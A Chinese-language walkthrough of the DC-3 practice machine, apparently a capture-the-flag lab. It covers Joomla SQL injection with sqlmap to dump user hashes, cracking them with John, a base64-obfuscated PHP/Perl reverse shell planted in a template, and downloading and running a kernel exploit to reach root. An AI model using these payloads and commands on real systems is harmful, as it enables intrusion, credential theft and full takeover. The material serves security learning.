文章目录
- 信息收集
- 漏洞查找
- 漏洞利用
- SQL注入
- John工具密码爆破
- 反弹shell
- 提权
信息收集
主机扫描
arp-scan -l
可以用netdiscover 它是一个主动/被动的ARP 侦查工具。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。
netdiscover -r 192.168.160.0/24
说明:
netdiscover: 这是一个网络探测工具的命令,用于执行本地网络中的主机发现。-r 192.168.160.0/24: 这是一个命令的选项参数,指定了要进行主机发现的 IP 地址范围。在这个例子中,IP 地址范围是192.168.160.0/24,表示从192.168.160.1到192.168.160.254的所有 IP 地址。当执行这个命令时,
netdiscover将发送 ARP 请求广播到指定的 IP 地址范围内的每个主机,并通过监听并收集其回应来确定哪些主机是活动的。通过这种方式,可以快速发现目标网络中的活动主机,以便进行进一步的分析或测试。
端口扫描
nmap -A 192.168.160.35
说明:
-A #全面扫描
nmap扫描工具使用
发现80端口可用,用的是Joomla的cms
浏览器访问DC-3的 80端口,用Wappalyzer插件,也可以看出是Joomla的
发现80端口可用,用的是Joomla的cms
浏览器访问DC-3的 80端口,用Wappalyzer插件,也可以看出是Joomla的
目录爆破
sudo python3 dirsearch.py -u 192.168.160.35 -i 200
说明:
-u URL# URL目标
-i#状态码
也可以用御剑后台扫描工具
也可以用nikto扫描 Nikto
进入后台管理页面
漏洞查找
joomscan
joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具。
joomscan -u 192.168.160.35
searchsploit
searchsploit是一款kali自带的搜索漏洞信息的模块,可参考searchsploit漏洞查找工具使用指南
searchsploit是一个基于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。
Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。
# 搜索 joomla 3.7.0版本的漏洞
searchsploit joomla 3.7.0
发现有SQL注入漏洞和跨站脚本漏洞
使用find命令找出42033.txt的位置
find / -name '42033.txt'
查看文件内容
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
给出了注入方法
漏洞利用
SQL注入
- 列出所有数据库
sqlmap -u "http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
说明:
-u "http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml": 这是一个选项参数,指定要进行注入测试的目标 URL。在这个例子中,目标 URL 是http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml。--risk=3: 这是一个选项参数,指定进行注入测试的风险级别(0-3,默认为1)。这里,风险级别被设置为 3,表示使用最高的风险级别进行测试。风险级别越低但是越安全--level=5: 这是一个选项参数,指定进行注入测试的深度级别。sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5--random-agent: 这是一个选项参数,指定在测试请求中使用随机的 User-Agent 头,以隐藏工具的身份。--dbs: 这是一个选项参数,指示 sqlmap 在发现数据库后列出数据库名称。-p list[fullordering]: 这是一个选项参数,指定要测试的注入点参数。在这个例子中,参数list[fullordering]被指定为注入点。执行这个命令时,sqlmap 将使用给定的参数和选项对目标 URL 进行注入测试。它将尝试发现 SQL 注入漏洞,并进一步探测和利用这些漏洞。通过设置风险级别和深度级别,可以增强测试的准确性和深度。
执行结果:
-
列出指定数据库的所有表
sqlmap -u "http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]说明:
--tables# 列出表执行结果:
-
列出指定库指定表的字段名
sqlmap -u "http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --column -p list[fullordering]
- 获取用户名和密码
sqlmap -u "http://192.168.160.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C username,password -p list[fullordering] --dump
说明:
-D joomladb: 这是一个选项参数,指定要查询的数据库名称。在这里数据库名称被指定为joomladb。-T "#__users": 这是一个选项参数,指定要查询的数据表名称。这里数据表名称被指定为#__users。-C username,password: 这是一个选项参数,指定要查询和显示的列名称。这里列名称被指定为username和password。-p list[fullordering]: 这是一个选项参数,指定要测试的注入点参数。这里参数list[fullordering]被指定为注入点。--dump: 这是一个选项参数,指示 sqlmap 在发现脆弱点后,从数据库中导出数据。
执行结果:
发现用户的密码做了加密
John工具密码爆破
john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。
利用John工具,对该密码进行爆破拆解,工具详细信息参考John介绍及常用命令使用说明
先在桌面创建一个文件,将得到的用户密码的hash值复制进去并保存,使用john破解。
john passwd.txt
执行结果:
得到密码后,登录后台界面
反弹shell
登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录
写入php反弹shell
反弹代码:
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
保存就上传好啦,再根据joomla的特性,模块会单独放在一个文件夹里/templates/,而beez3模块就在/templates/beez3/里面,刚才创建的shell路径为
http://192.168.160.35/templates/beez3/webshell.php
用kali来监听
nc -lvvp 7777
浏览器访问shell.php的地址http://192.168.160.35/templates/beez3/webshell.php
反弹成功!!!
Get交互shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
说明:
python3: 这是执行 Python 解释器的命令。-c 'import pty; pty.spawn("/bin/bash")': 这是一个以字符串方式传递给 Python 解释器的脚本。脚本导入了pty模块,并使用pty.spawn()函数来启动一个新的/bin/bash终端。当你在终端中执行这个命令时,它会调用 Python 解释器并执行指定的脚本。脚本导入
pty模块,并使用pty.spawn()函数来生成一个新的伪终端(shell)。这样,你就可以与一个交互式的终端进行交互,就像运行/bin/bash一样。它通常在渗透测试或特权升级等情况下使用。它允许将一个非交互式的终端(shell)转变为一个可交互的终端,从而获取更多的权限和控制。
交互shell获取成功,但是还不是root权限
提权
查看操作系统版本信息
tac /etc/issue
说明:
tac是一个命令行工具,用于反向显示文件的内容。/etc/issue是一个特定的文件路径,代表系统登录时显示的欢迎信息。当你在终端中执行
tac /etc/issue命令时,它会打开/etc/issue文件并以相反的顺序显示文件的内容。换句话说,它会将文件的最后一行显示在第一行,倒数第二行显示在第二行,以此类推,直到第一行显示在最后。在许多 Linux 发行版中,
/etc/issue文件通常包含一个欢迎信息,用于在用户登录或启动时显示系统的版本、主机名等相关信息。使用tac /etc/issue命令可以反向显示这个欢迎信息,从底部开始逐行显示。
cat /proc/version
说明:
cat /proc/version是一个用于在 Linux 系统中查看内核版本信息的命令。在 Linux 中,
/proc目录是一个虚拟文件系统,提供了对运行中的内核和进程信息的访问。其中的/proc/version文件包含有关内核版本的详细信息。
再次使用searchsploit工具搜索漏洞
searchsploit Ubuntu 16.04
Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式
使用find命令查找路径
find / -name '39772.txt'
执行结果:
绝对路径为:
/usr/share/exploitdb/exploits/linux/local/39772.txt
也可以直接用searchsploit -p linux/local/39772.txt会直接显示出绝对路径
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
溢出提权(exp提权)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
下载39772.zip,粘贴复制到kali里(不能拖到kali里面,否则会出现丢包的现象)
在桌面开启http服务,将下载好的文件导入到DC-3靶机里
python3 -m http.server 8888
浏览器进行访问http://192.168.160.32:8888
出现这个说明服务开启成功,exp地址是
http://192.168.160.32:8888/39772/exploit.tar
回到刚才的python交互shell
wget http://192.168.160.32:8888/39772/exploit.tar
下载完后用tar命令解压该压缩包
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
执行
./compile.sh
./doubleput
使用whoami 和id查看当前用户和用户id
切换到root的家目录
查看the-flag.txt
